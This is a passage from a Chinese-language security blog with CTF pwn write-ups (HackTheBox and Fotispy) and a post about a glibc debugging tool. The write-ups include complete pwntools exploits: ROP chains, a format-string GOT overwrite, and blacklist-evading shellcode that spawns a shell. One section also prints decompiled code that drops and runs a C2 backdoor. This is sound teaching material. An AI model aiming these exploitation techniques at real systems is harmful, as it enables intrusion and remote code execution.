  struct Favourite *v0; // rax
  char dest[13]; // [rsp+Bh] [rbp-15h] BYREF
  Favourite *favorites; // [rsp+18h] [rbp-8h]

  if ( login_idx == -1 )
  {
    LODWORD(v0) = puts("[-] No user has logged in yet.");
  }
  else
  {
    favorites = (Favourite *)users[(unsigned __int8)login_idx]->favorites;
    memset(dest, 0, sizeof(dest));
    LODWORD(v0) = puts("[~] Your favorites:");
    while ( favorites )
    {
      memcpy(dest, favorites->song->title, (unsigned int)favorites->song->title_len);
      printf("    - Song: %s", dest);
      memcpy(dest, favorites->song->album, (unsigned int)favorites->song->album_len);
      printf(" - %s", dest);
      memcpy(dest, favorites->song->from, (unsigned int)favorites->song->from_len);
      printf(" - %s\n", dest);
      v0 = favorites->next;
      favorites = favorites->next;
    }
  }
  return (int)v0;
}

继续分析，发现 add_song 会读取 256 字节数据，并设置对应数据的长度为 256。那配合上面的 display_fav，就完全可以 BOF 打 ROP 了。

int add_song()
{
  struct Userdata *v0; // rax
  struct Favorite *v2; // [rsp+8h] [rbp-38h]
  struct Song *song; // [rsp+10h] [rbp-30h]
  int from_len; // [rsp+1Ch] [rbp-24h]
  int album_len; // [rsp+20h] [rbp-20h]
  int title_len; // [rsp+24h] [rbp-1Ch]
  char *album; // [rsp+28h] [rbp-18h]
  char *from; // [rsp+30h] [rbp-10h]
  char *title; // [rsp+38h] [rbp-8h]

  if ( login_idx == -1 )
  {
    LODWORD(v0) = puts("[-] No user has logged in yet.");
  }
  else
  {
    title = (char *)calloc(256uLL, 1uLL);
    from = (char *)calloc(256uLL, 1uLL);
    album = (char *)calloc(256uLL, 1uLL);
    printf("[DEBUG] %p\n", &printf);
    printf("[~] Please enter a song title: ");
    title_len = readn((__int64)title, 256LL);
    printf("[~] Please enter a who %s is from: ", title);
    album_len = readn((__int64)album, 256LL);
    printf("[~] Please enter which album %s is on: ", title);
    from_len = readn((__int64)from, 256LL);
    song = (struct Song *)calloc(48uLL, 1uLL);
    song->from = from;
    song->from_len = from_len;
    song->title = title;
    song->title_len = title_len;
    song->album = album;
    song->album_len = album_len;
    v2 = (struct Favorite *)calloc(16uLL, 1uLL);
    *((_QWORD *)v2 + 1) = song;
    *(_QWORD *)v2 = users[(unsigned __int8)login_idx]->favorites;
    v0 = users[(unsigned __int8)login_idx];
    v0->favorites = v2;
  }
  return (int)v0;
}

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    args,
    context,
    flat,
    process,
    remote,
    u64,
)

FILE = "./fotispy1"
HOST, PORT = "52.59.124.14", 5191

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = ELF("./libc.so.6")


def register(target, username, password):
    target.sendlineafter(b"Please enter your choice [E]: ", b"0")
    target.sendlineafter(b"username: ", username)
    target.sendlineafter(b"password: ", password)


def login(target, username, password):
    target.sendlineafter(b"Please enter your choice [E]: ", b"1")
    target.sendlineafter(b"username: ", username)
    target.sendlineafter(b"password: ", password)


def leak(target):
    target.recvuntil(b"[DEBUG] ")
    return int(target.recvline().strip(), 16)


def add(target, song_title, song_from, song_on):
    target.sendlineafter(b"Please enter your choice [E]: ", b"2")
    printf_addr = leak(target)

    target.sendlineafter(b"title: ", song_title)
    target.sendlineafter(b"from: ", song_from)
    target.sendlineafter(b"on: ", song_on)
    return printf_addr


def display(target):
    target.sendlineafter(b"Please enter your choice [E]: ", b"3")


def launch():
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)
    return target


def main():
    target = launch()

    register(target, b"admin", b"admin")
    login(target, b"admin", b"admin")
    printf_addr = add(target, b"a", b"a", b"a")
    libc.address = printf_addr - libc.sym["printf"]

    payload = b"A" * 0xD
    add(target, b"a", b"a", payload)
    display(target)

    target.recvuntil(b"\x0a")
    target.recvuntil(b"\x0a")
    favourite_addr = u64(target.recvuntil(b"\x0a").strip()[-4:].ljust(0x8, b"\x00"))

    pop_rdi = libc.address + 0x00000000000277E5
    one_gadget = libc.address + 0xD515F
    payload = flat(
        b"A" * 0xD,
        favourite_addr,
        elf.bss(),
        pop_rdi,
        0x0,
        one_gadget,
    )
    add(target, b"a", b"a", payload)
    display(target)

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[ENO{3v3ry_r0p_ch41n_st4rts_s0m3wh3r3}]

Dynabox: 跨平台 glibc 编译，调试相关问题的统一解决方案

Sun, 31 Aug 2025 00:00:00 GMT

import GithubCard from "@components/misc/GithubCard.astro";

前言

万事开头难……准备开始学习堆利用了，不过发现想要在 Arch Linux 上获得预期的源码级调试体验有点有点费劲，没有像 ubuntu 那样的 libc6-dbg 软件包，试过配置 debuginfod 服务，也没有解决问题（很爆炸，等我把这个项目撸完后才发现，原来用 ubuntu 的 debuginfod 地址就行了，不能用 arch 的……）。glibc-all-in-one 下载下来的 glibc 动态链接库默认也是 stripped 的，虽然它提供了 build 脚本，但那是针对 ubuntu 开发的，Arch 上使用会出现很多问题（比如我编译 glibc 2.23 就没成功）。

有关在宿主机上编译低版本 glibc 的问题

学习堆利用难免要自己写点程序，使用对应版本的 glibc 编译。起初我是用 glibc-all-in-one 下载对应 glibc 共享库，然后编译的时候通过 -Wl,--rpath="$GLIBC_PATH/lib" 和 -Wl,--dynamic-linker="$GLIBC_PATH/lib/ld-linux-x86-64.so.2" 指定使用对应的 loader 和 libc. 但运行却遇到 Version 'GLIBC_2.34' not found 问题，程序跑不起来，以致每次为了编译个程序还得启动个 docker，太麻烦了。

通过 strings 看了一下，编译出来的程序有 __libc_start_main@GLIBC_2.34，使用了高版本 glibc, 其它函数倒是正确使用了低版本 glibc, 比如 malloc@GLIBC_2.2.5. 我本来以为是宿主机 gcc 版本太高，而我需要的 glibc 是 2.23, 可能之间相差太大了，所以不兼容。但是后来才知道，这和 gcc 毛关系都没有，而是因为 gcc 会从系统默认的 libc 动态链接库路径获得各种共享对象文件，虽然我编译的时候设置了 loader 和查找 libc 的路径，但是其它库文件还是会从默认路径去取。导致一部分是正确链接了低版本库，一部分没找到的就链接了系统默认的高版本库。

总之期间走了不少弯路，花了两天去折腾怎么安装低版本 gcc，因为 Arch 是滚动更新，所有软件都保持在最新版本，bro 想弄个低版本 gcc 太不容易了。AUR 上提供的 gcc 包安装编译各种问题层出不穷。本以为看到 AUR 是看到了希望，现实却让人大失所望……

因为路线错误，一心以为换个低版本 gcc 就能解决问题，所以我还是坚持研究出来了怎么在 Arch 上编译低版本 gcc，学到了如何写 PKGBUILD、如何使用 Arch build system 和如何使用 chroot 等……虽然折腾期间学到了不少新知识，但很不幸，当我兴奋地将历经九九八十一难编译出来的低版本 gcc 安装到机子上后……编译！运行！草！为毛还是 Version 'GLIBC_2.34' not found！感觉受到了致命打击……研究了两天的成果并没有软用，但至少也说明了和 gcc 版本没关系，而是另有所因……

最终，在我的严厉拷问<s>（软磨硬泡）</s>下，AI 给出了一个我从未见过的 -B 编译选项。我也是非常渴望解决问题啊，直接就拿来测试了。再编译，运行……？居然成功了！之后我 gcc --help 查了一下这个选项的含义，发现对其的描述是 -B <directory> Add <directory> to the compiler's search paths.. 好家伙，搞了半天编译的时候只设置 loader 和 libc 路径并没有用啊，还得设置一个默认搜索路径……不过我也曾试过用 -I 和 -L 设置库路径，却没成功，可能是编译不只是用到了库，还有别的东西？

至此，直接在宿主机下编译使用低版本 glibc 程序的问题，终于 tmd 解决了！

这里必须要吐槽一下，即便是 GPT-5 对于这些问题，知识面也不是很足啊，我天天问，各种角度问，它就是给不出正确的解决方案，老是搁那儿一本正经地胡说八道……

gdb 调试没有符号信息

解决了使用宿主机编译低版本 glibc 程序的问题，接下来就该解决一下没有 debug symbols 的问题了。glibc-all-in-one 下载的 glibc 都是 stripped 的，虽然里面提供了 .debug 目录，保存了调试信息，但当我将这写调试信息加载到 gdb 中后，gdb 的 heap 命令就被破坏了。原因可能是直接加载调试信息并不会自动设置 libc 基地址，加载出来的都是各种符号在 libc 里面的偏移。而 heap 指令又依赖 glibc 信息和各种结构体信息，比如 mp_ 什么的……因此如果只是加载了偏移地址，而没有设置基地址，那自然会破坏这些指令的配置。这块儿我也研究了半天，试过加载的时候自动设置基地址，不过好像没有这样的指令，也试过根据 heap-config 所需的信息手动计算物理地址修复 heap 指令的使用，但是既麻烦，也没有成功……

让人心态爆炸的是，等我撸完了这个项目后才发现 glibc-all-in-one 下载下来的共享对象文件里面的 .debug 目录，包含的并不是单纯的调试信息文件，而是 tmd 没 strip 的共享对象文件……为此我之前还特地写了一个 gdb 插件 load-symbols，迭代加载指定目录下的 debug 信息……只能说当时被别人的博客误导了，然后自己也没注意看，眼睛瞎了，隔了那么就才发现……要不是在群里和其他师傅们交流，我可能到现在都没发现也说不准……不过没事，手动 patchelf 指定它的路径写起来也麻烦，更重要的是，它虽然也提供了没 strip 的 libc，但这只能解决已有二进制文件的运行问题，如果想在宿主机上自己编译使用低版本 libc 的程序就不行了，还是需要有编译好的版本。

无奈，摆在我面前的是两条路：

调试的时候手动计算各种符号的物理地址，下断点
使用别人配置好的虚拟机环境，或者自己整一个

老实说两个方法都很麻烦，我一个也不想用……我只是想本地能直接使用 b *_int_free 这样的指令而已，为啥那么费劲呀……

被逼无奈，当时是准备搭一个 Docker 调试环境的，试了下 pwndocker，但是发现里面的工具版本都比较老了，于是强迫症+完美主义的我想自己从头开始构建一个 Docker Pwn 环境。最后确实是搭好了，<s>但是我一次都没用过……</s>心理那叫一个难受啊，哈哈哈，我本来就用的 Linux, 只想在本地解决所有问题，而不是每次要做点什么的时候还必须放到虚拟机里面去做，那多麻烦，多奇怪啊，加之我平时虚拟机用的就少，还得学习一下它的用法，感觉学习成本太高了，我只是想开开心心地直接开始做事。还有一个原因就是虚拟机环境和我本地环境配置有很大出入，所以用起来一点也不舒服，而我又懒得去配，让它和我本地统一……~懒成这样是不是没救了？~

Dynabox

嗯……上面就是创建这个项目的原因了，虽然这个项目底层本质上还是用虚拟机，但这或许是最好的解决本地不能编译的问题的方法了。不过我的脚本已经将虚拟机的操作完全封装好了，不需要学习任何有关 Docker 的使用，所以还是很方便滴。

项目地址下面给出了，感兴趣的师傅可以去试试看，能给个 star 的话最好不过了哈哈。

至于这个工具怎么用我就不在这里赘述了，请师傅们移步项目 README. 本来写这篇博客也就是为了随便记录一下折腾的过程，虽然不知道写这个有啥用，但就是想写哈哈哈。

后期打算用其它语言重构一下，因为考虑到后面子命令越来越多，shell 脚本可能会长到难以维护。正好也能锻炼一下开发能力吧，因为平时自己写代码的时间太少了。

比较可惜的是，也是在我自己撸完这个项目后才发现的，有个叫 pwninit 的项目已经实现了和我这个项目类似的功能，不过他的项目并没有解决本地编译低版本 glibc 程序的问题，所以我这个项目还是有点不一样的东西的 xD

Write-ups: HackTheBox

Thu, 24 Jul 2025 00:00:00 GMT

r0bob1rd

Difficulty

EASY

Description

I am developing a brand new game with robotic birds. Would you like to test my progress so far?

Write-up

unsigned __int64 operation()
{
  unsigned int v1; // [rsp+Ch] [rbp-74h] BYREF
  char s[104]; // [rsp+10h] [rbp-70h] BYREF
  unsigned __int64 v3; // [rsp+78h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  printf("\nSelect a R0bob1rd > ");
  fflush(stdout);
  __isoc99_scanf("%d", &v1);
  if ( v1 > 9 )
    printf("\nYou've chosen: %s", (const char *)&(&robobirdNames)[v1]);
  else
    printf("\nYou've chosen: %s", (&robobirdNames)[v1]);
  getchar();
  puts("\n\nEnter bird's little description");
  printf("> ");
  fgets(s, 106, stdin);
  puts("Crafting..");
  usleep(0x1E8480u);
  start_screen();
  puts("[Description]");
  printf(s);
  return __readfsqword(0x28u) ^ v3;
}

观察到 operation 函数存在几个漏洞：

if ( v1 > 9 ) 没有对 v1 做边界检查，OOB
fgets(s, 106, stdin); BOF
printf(s); 格式化字符串

先看看 robobirdNames 附近有什么东西：

pwndbg> x/a &robobirdNames
0x6020a0 <robobirdNames>: 0x400ce8
pwndbg> x/50gx 0x6020a0-0x100
0x601fa0: 0x0000000000000000 0x0000000000000000
0x601fb0: 0x0000000000000000 0x0000000000000000
0x601fc0: 0x0000000000000000 0x0000000000000000
0x601fd0: 0x0000000000000000 0x0000000000000000
0x601fe0: 0x0000000000000000 0x0000000000000000
0x601ff0: 0x00007ffff7c58f90 0x0000000000000000
0x602000: 0x0000000000601e10 0x00007ffff7e29190
0x602010: 0x00007ffff7c15df0 0x0000000000400766
0x602020 <puts@got.plt>: 0x00007ffff7cb9420 0x0000000000400786
0x602030 <printf@got.plt>: 0x00007ffff7c96c90 0x00007ffff7d17d90
0x602040 <fgets@got.plt>: 0x00000000004007b6 0x00000000004007c6
0x602050 <signal@got.plt>: 0x00007ffff7c77f00 0x00007ffff7cb7340
0x602060 <setvbuf@got.plt>: 0x00007ffff7cb9ce0 0x00007ffff7c980b0
0x602070 <usleep@got.plt>: 0x0000000000400816 0x0000000000000000
0x602080: 0x0000000000000000 0x0000000000000000
0x602090: 0x0000000000000000 0x0000000000000000
0x6020a0 <robobirdNames>: 0x0000000000400ce8 0x0000000000400cf2
0x6020b0 <robobirdNames+16>: 0x0000000000400cff 0x0000000000400d0c
0x6020c0 <robobirdNames+32>: 0x0000000000400d18 0x0000000000400d26
0x6020d0 <robobirdNames+48>: 0x0000000000400d30 0x0000000000400d40
0x6020e0 <robobirdNames+64>: 0x0000000000400d4b 0x0000000000400d5b
0x6020f0: 0x0000000000000000 0x0000000000000000
0x602100 <stdout@@GLIBC_2.2.5>: 0x00007ffff7e226a0 0x0000000000000000
0x602110 <stdin@@GLIBC_2.2.5>: 0x00007ffff7e21980 0x0000000000000000
0x602120 <stderr@@GLIBC_2.2.5>: 0x00007ffff7e225c0 0x0000000000000000

注意到这个地址下方不远处就是 got 表，因此我们可以通过输入负索引来泄漏它，然后算出 libc 基址。

所以最后思路应该是泄漏 setvbuf，计算出 one_gadget 的地址，再利用格式化字符串漏洞篡改 __stack_chk_fail 为 one_gadget 地址。而为了触发 __stack_chk_fail，我们需要利用 fgets 的 BOF 来破坏 canary.

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    args,
    context,
    fmtstr_payload,
    process,
    raw_input,
    remote,
    u64,
)

FILE = "./r0bob1rd"
HOST, PORT = "94.237.122.117", 56995

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = ELF("./glibc/libc.so.6")


def launch():
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)
    return target


def main():
    target = launch()

    target.sendlineafter(b"> ", str(-8))
    target.recvuntil(b": ")

    setvbuf = u64(target.recvline().strip().ljust(0x8, b"\x00"))
    libc.address = setvbuf - libc.sym["setvbuf"]
    one_gadget = libc.address + 0xE3B01

    fmtstr = fmtstr_payload(
        8, {elf.got["__stack_chk_fail"]: one_gadget}, write_size="short"
    )
    # raw_input("DEBUG")
    target.sendlineafter(b"> ", fmtstr.ljust(106, b"\x00"))

    target.interactive()


if __name__ == "__main__":
    main()

Execute

Difficulty

EASY

Description

Can you feed the hungry code?

Write-up

保护全开，但是栈可执行。

// gcc execute.c -z execstack -o execute

#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

void setup() {
  setvbuf(stdin, NULL, _IONBF, 0);
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stderr, NULL, _IONBF, 0);
  alarm(0x7f);
}

int check(char *blacklist, char *buf, int read_size, int blacklist_size) {
  for (int i = 0; i < blacklist_size; i++) {
    for (int j = 0; j < read_size - 1; j++) {
      if (blacklist[i] == buf[j])
        return 0;
    }
  }

  return 1337;
}

int main() {
  char buf[62];
  char blacklist[] =
      "\x3b\x54\x62\x69\x6e\x73\x68\xf6\xd2\xc0\x5f\xc9\x66\x6c\x61\x67";

  setup();

  puts("Hey, just because I am hungry doesn't mean I'll execute everything");

  int size = read(0, buf, 60);

  if (!check(blacklist, buf, size, strlen(blacklist))) {
    puts("Hehe, told you... won't accept everything");
    exit(1337);
  }

  ((void (*)())buf)();
}

程序对我们的输入做了一个检查，禁用了一些字节，除此以外没有太多限制。所以思路还是打 shellcode.

关于 mask 的爆破，利用了 a ^ b ^ b = a 的性质。

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    asm,
    context,
    disasm,
    log,
    p64,
    process,
    raw_input,
    remote,
    u64,
)

FILE = "./execute"
HOST, PORT = "94.237.54.192", 31583

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)
    return target


def main():
    target = launch()

    blacklist = set(b"\x3b\x54\x62\x69\x6e\x73\x68\xf6\xd2\xc0\x5f\xc9\x66\x6c\x61\x67")
    mask = b""
    target_string = u64(b"/bin/sh".ljust(0x8, b"\x00"))

    for byte in range(0, 0x100):
        mask = int(f"{byte:02x}" * 8, 16)
        encoded = p64(mask ^ target_string)

        if all(byte not in blacklist for byte in encoded):
            log.success(f"Found mask: {hex(mask)}")
            break

    payload = asm(f"""
        mov rax, {mask}
        push rax
        mov rax, {mask} ^ {target_string}
        xor [rsp], rax
        mov rdi, rsp
        push 0
        pop rsi
        push 0
        pop rdx
        mov rbx, 0x3a
        inc rbx
        mov rax, rbx
        syscall
    """)

    log.success(disasm(payload))

    for byte in payload:
        if byte in blacklist:
            log.warn(f"Bad byte: {byte:2x}")

    # raw_input("DEBUG")
    target.sendline(payload)
    target.interactive()


if __name__ == "__main__":
    main()

Restaurant

Difficulty

EASY

Description

Welcome to our Restaurant. Here, you can eat and drink as much as you want! Just don't overdo it..

Write-up

只提供了 libc，为了 patchelf 还得去找对应 ld：

λ ~/Projects/pwn/Restaurant/ strings libc.so.6 | grep "GLIBC"
GLIBC_2.2.5
GLIBC_2.2.6
GLIBC_2.3
GLIBC_2.3.2
GLIBC_2.3.3
GLIBC_2.3.4
GLIBC_2.4
GLIBC_2.5
GLIBC_2.6
GLIBC_2.7
GLIBC_2.8
GLIBC_2.9
GLIBC_2.10
GLIBC_2.11
GLIBC_2.12
GLIBC_2.13
GLIBC_2.14
GLIBC_2.15
GLIBC_2.16
GLIBC_2.17
GLIBC_2.18
GLIBC_2.22
GLIBC_2.23
GLIBC_2.24
GLIBC_2.25
GLIBC_2.26
GLIBC_2.27
GLIBC_PRIVATE
GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1.4) stable release version 2.27.

可以看到使用的是 GLIBC 2.27，通过 glibc-all-in-one 下载 release 版本的 GLIBC，得到对应 ld.

使用以下命令来 patchelf，--set-rpath . 是让它在当前目录下自己找 libc.so.6，我们只要通过 --set-interpreter 设置好动态连接器就行了。

sudo patchelf --set-interpreter "$(pwd)/ld-2.27.so" --set-rpath . ./restaurant

这个程序本身没什么复杂的，注意到只有 fill 函数里面的一个 read 存在 BOF，用它构造 ROP Chain 就好了。先泄漏 libc，然后再返回到 fill 二次输入。

Exploit

#!/usr/bin/env python3

from pwn import ELF, ROP, args, context, flat, process, raw_input, remote, u64

FILE = "./restaurant"
HOST, PORT = "94.237.60.55", 54861

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
rop = ROP(elf)
libc = ELF("./libc.so.6")


def launch():
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)
    return target


def main():
    target = launch()

    # raw_input("DEBUG")
    target.sendlineafter(b"> ", str(1))

    payload = flat(
        b"A" * 0x28, rop.rdi.address, elf.got["puts"], elf.plt["puts"], elf.sym["fill"]
    )
    target.sendafter(b"> ", payload)

    target.recvuntil(b"\xa3\x10\x40")
    libc.address = u64(target.recv(0x6).strip().ljust(8, b"\x00")) - libc.sym["puts"]
    one_gadget = libc.address + 0x10A41C

    payload = flat(b"A" * 0x28, one_gadget)
    target.sendafter(b"> ", payload)

    target.interactive()


if __name__ == "__main__":
    main()

You know 0xDiablos

Difficulty

EASY

Description

I missed my flag

Write-up

BOF，后门函数 flag，检测两个参数。32-bit 栈传参，没啥好说的，不过 python 整数是无限精度的，给它 -1 它就认为这是数学上的 -1，所以我们必须通过把数字截断为 32-bit 补码的形式来模拟 C 在内存中的数据表示。

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    fit,
    process,
    raw_input,
    remote,
)

FILE = "./vuln"
HOST, PORT = "94.237.57.115", 42156

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)
    return target


def main():
    target = launch()

    payload = fit(
        {
            0xBC: elf.sym["flag"],
            0xC0: elf.sym["exit"],
            0xC4: -559038737 & 0xFFFFFFFF,
            0xC8: -1059139571 & 0xFFFFFFFF,
        }
    )
    # raw_input("DEBUG")
    target.sendlineafter(b": ", payload)

    target.interactive()


if __name__ == "__main__":
    main()

TicTacToed

Difficulty

MEDIUM

Description

A lawfirm recently busted an underground network of a part-time cybermafia group. Upon investigation they found nothing but a single tic-tac-toe game on their computer. The forensics team suspect it to be more than just a game. Can you expose them ?

Write-up

Jesus, its a Rust Pwn challenge! 迎接地狱难度的逆向分析吧。

先运行看看，感受一下程序的基本逻辑：

如其名，完全就是一个井字棋游戏，5 个相同棋子连成一条线就赢了。并且我们的对手……我们哪来的对手？X 和 O 的棋子都是自己控制的，谁赢谁输都是我们自行决定。嗯……这样的话应该会简单很多吧？至少不用被迫去对抗一个 AI 棋手……~我下棋最烂了……~

然后丢给 IDA 老婆，逆天，光是 IDA 加载并分析完这个程序都足足花了几分钟才完成，它太大了。也不知道作者在里面塞了些什么乱七八糟的东西……整个程序有整整 5.5M 大小。

int __fastcall main(int argc, const char **argv, const char **envp)
{
  return std::rt::lang_start(&tictactoe::main, argc, argv, 0LL);
}

第一次做 Rust Pwn，发现反汇编出来和 C 语法都差不多，先定位 main 函数，发现叫 tictactoe::main。根据我之前学过的那么一丢丢 rust 语法，tictactoe 应该就是这个程序的 crate 名。

crate 的话就类似于其它语言中的 package 的概念，一般这些 package 下都包含了多个相关的函数实现，我们可以在 IDA 的 Function name 窗口进行搜索，发现这个 crate 里确实包含了不少东西：

其中比较引人注目的应该是这个叫做 tictactoe::execute_c2 的函数，一眼 backdoor.

__int64 __fastcall tictactoe::execute_c2(int a1, int a2, int a3, int a4, int a5, int a6)
{
  int v6; // eax
  int v7; // r8d
  int v8; // r9d
  int v9; // eax
  int v10; // ecx
  int v11; // r8d
  int v12; // r9d
  int v13; // eax
  int v14; // r8d
  int v15; // r9d
  int v16; // ecx
  int v17; // r8d
  int v18; // r9d
  int v19; // r9d
  int v20; // edx
  int v21; // ecx
  int v22; // r8d
  int v23; // r9d
  int v25; // [rsp+0h] [rbp-148h]
  int v26; // [rsp+0h] [rbp-148h]
  int v27; // [rsp+0h] [rbp-148h]
  int v28; // [rsp+0h] [rbp-148h]
  int v29; // [rsp+0h] [rbp-148h]
  struct _Unwind_Exception *v30; // [rsp+0h] [rbp-148h]
  int v31; // [rsp+8h] [rbp-140h]
  int v32; // [rsp+8h] [rbp-140h]
  int v33; // [rsp+8h] [rbp-140h]
  int v34; // [rsp+8h] [rbp-140h]
  int v35; // [rsp+8h] [rbp-140h]
  int v36; // [rsp+8h] [rbp-140h]
  int v37; // [rsp+10h] [rbp-138h]
  int v38; // [rsp+10h] [rbp-138h]
  int v39; // [rsp+10h] [rbp-138h]
  int v40; // [rsp+10h] [rbp-138h]
  int v41[2]; // [rsp+10h] [rbp-138h]
  int v42; // [rsp+18h] [rbp-130h]
  char v43; // [rsp+18h] [rbp-130h]
  int v44; // [rsp+18h] [rbp-130h]
  char v45; // [rsp+18h] [rbp-130h]
  int v46; // [rsp+18h] [rbp-130h]
  int v47; // [rsp+18h] [rbp-130h]
  int v48; // [rsp+1Ch] [rbp-12Ch] BYREF
  struct _Unwind_Exception *v49; // [rsp+20h] [rbp-128h]
  int v50; // [rsp+28h] [rbp-120h]
  struct _Unwind_Exception *v51; // [rsp+30h] [rbp-118h]
  int v52; // [rsp+38h] [rbp-110h] BYREF
  int v53; // [rsp+40h] [rbp-108h]
  int v54; // [rsp+48h] [rbp-100h]
  struct _Unwind_Exception *v55; // [rsp+50h] [rbp-F8h]
  int v56[42]; // [rsp+58h] [rbp-F0h] BYREF
  struct _Unwind_Exception *v57; // [rsp+100h] [rbp-48h]
  int v58; // [rsp+108h] [rbp-40h]
  _BYTE v59[32]; // [rsp+128h] [rbp-20h] BYREF

  v6 = std::fs::write(
         (int)aTmpC2Executabl,
         18,
         (int)&off_3A4F30,
         a4,
         a5,
         a6,
         (int)aTmpC2Executabl,
         18,
         v37,
         v42,
         (int)v49,
         v50,
         (int)v51,
         v52,
         v53,
         v54,
         v55,
         v56[0]);
  core::result::Result<T,E>::expect(
    v6,
    (int)aFailedToWriteC,
    25,
    (int)&off_3A4F40,
    v7,
    v8,
    v25,
    v31,
    v38,
    v43,
    v49,
    v50);
  v9 = <std::fs::Permissions as std::os::unix::fs::PermissionsExt>::from_mode(493LL);
  v13 = std::fs::set_permissions(v26, v32, v9, v10, v11, v12, v26, v32, v39, v44, (int)v49, v50, v51, v52);
  core::result::Result<T,E>::expect(
    v13,
    (int)aFailedToSetExe,
    33,
    (int)&off_3A4F58,
    v14,
    v15,
    v27,
    v33,
    v40,
    v45,
    v49,
    v50);
  std::process::Command::new(
    (int)v56,
    v28,
    v34,
    v16,
    v17,
    v18,
    v28,
    v34,
    (int)v56,
    v46,
    (int)v49,
    v50,
    (int)v51,
    v52,
    v53,
    v54,
    (int)v55,
    v56[0],
    v56[2],
    v56[4],
    v56[6],
    v56[8],
    v56[10],
    v56[12],
    v56[14],
    v56[16],
    v56[18],
    v56[20],
    v56[22],
    v56[24],
    v56[26],
    v56[28],
    v56[30],
    v56[32],
    v56[34],
    v56[36],
    v56[38],
    v56[40],
    v57,
    v58);
  std::process::Command::spawn(&v52, *(_QWORD *)v41);
  core::result::Result<T,E>::expect(
    (int)&v48,
    (int)&v52,
    (int)aFailedToExecut,
    27,
    (int)&off_3A4F70,
    v19,
    v29,
    v35,
    v41[0],
    v47,
    (int)v49,
    v50,
    v51,
    v52);
  core::ptr::drop_in_place<std::process::Command>(v56);
  std::process::Child::wait(v59, &v48);
  core::ptr::drop_in_place<core::result::Result<std::process::ExitStatus,std::io::error::Error>>(v59);
  return core::ptr::drop_in_place<std::process::Child>((int)&v48, (int)&v48, v20, v21, v22, v23, v30, v36);
}

进去一看虽说有一大坨，不过细看其实很简单。std::fs::write 将 C2 (Command and Control) 后门程序写入到 /tmp/C2_executable 中（程序里塞程序，难怪那么大……），并通过 std::fs::set_permissions 将权限设置为 0755，这一点可以从 from_mode(493LL) 看出来。接着，通过 std::process::Command::new 创建准备执行的命令行指令（这会设置好它的参数，环境变量等）。用脚想都可以猜出来创建的命令肯定是用来执行 C2 的，根本用不着去分析参数。然后用 std::process::Command::spawn 生成子进程，异步运行 Command 创建的指令。嗯……看到这里就不用继续了，后面无非就是释放空间和获取子进程的退出状态等操作，对我们来说没多大用处。

此时，我们的宏观目标已经是非常清晰的了，就是要搞清楚如何调用 tictactoe::execute_c2。一开始我想着可能有输入方面的漏洞，然后构造一个 ROP Chain 或者什么东西去调用它。不过我同时又清楚，Rust 以其安全性而扬名，所以题目如果是考察 Rust 的编码漏洞，那就未免有点太难了，虽然不排除确实有这个可能……总之，我在这一块还是浪费了将近一个小时，去研究 main 函数中对输入的处理是否存在什么漏洞，事实证明根本没有……

下面来分析 main 函数的基本逻辑：

__int64 tictactoe::main()
{
  int *v0; // rcx
  __int64 v1; // rdx
  int line; // eax
  int v3; // edx
  int v4; // r9d
  __int64 v5; // rax
  __int64 v6; // rdx
  __int64 v7; // rcx
  int v8; // r8d
  int v9; // r9d
  int v10; // esi
  int v11; // edx
  int v12; // ecx
  int v13; // r8d
  int v14; // r9d
  char **v15; // rsi
  int v16; // edx
  int v17; // ecx
  int v18; // r8d
  int v19; // r9d
  int v20; // edx
  int v21; // ecx
  int v22; // r8d
  int v23; // r9d
  int v25; // edx
  int v26; // ecx
  int v27; // r8d
  int v28; // r9d
  __int64 v29; // rdx
  int v30; // [rsp+0h] [rbp-4E8h]
  struct _Unwind_Exception *v31; // [rsp+0h] [rbp-4E8h]
  struct _Unwind_Exception *v32; // [rsp+0h] [rbp-4E8h]
  struct _Unwind_Exception *v33; // [rsp+0h] [rbp-4E8h]
  __int64 v34; // [rsp+8h] [rbp-4E0h]
  int v35; // [rsp+8h] [rbp-4E0h]
  int v36; // [rsp+8h] [rbp-4E0h]
  int v37; // [rsp+8h] [rbp-4E0h]
  __int64 v38; // [rsp+10h] [rbp-4D8h]
  __int64 v39; // [rsp+18h] [rbp-4D0h]
  int v40; // [rsp+20h] [rbp-4C8h]
  char is_full; // [rsp+26h] [rbp-4C2h]
  char v42; // [rsp+27h] [rbp-4C1h]
  char v43; // [rsp+28h] [rbp-4C0h]
  int v44[2]; // [rsp+28h] [rbp-4C0h]
  struct _Unwind_Exception *v45; // [rsp+30h] [rbp-4B8h]
  __int64 *v46; // [rsp+30h] [rbp-4B8h]
  int v47; // [rsp+38h] [rbp-4B0h]
  _QWORD *v48; // [rsp+38h] [rbp-4B0h]
  struct _Unwind_Exception *v49; // [rsp+40h] [rbp-4A8h]
  struct _Unwind_Exception **v50; // [rsp+48h] [rbp-4A0h]
  int v51[2]; // [rsp+50h] [rbp-498h]
  int v52; // [rsp+5Ch] [rbp-48Ch]
  int v53[2]; // [rsp+68h] [rbp-480h]
  _QWORD *v54; // [rsp+70h] [rbp-478h]
  int v55[2]; // [rsp+78h] [rbp-470h]
  char v56[8]; // [rsp+D8h] [rbp-410h]
  char v57[8]; // [rsp+138h] [rbp-3B0h]
  int v58[2]; // [rsp+148h] [rbp-3A0h]
  int v59[25]; // [rsp+154h] [rbp-394h] BYREF
  _QWORD v60[2]; // [rsp+1B8h] [rbp-330h]
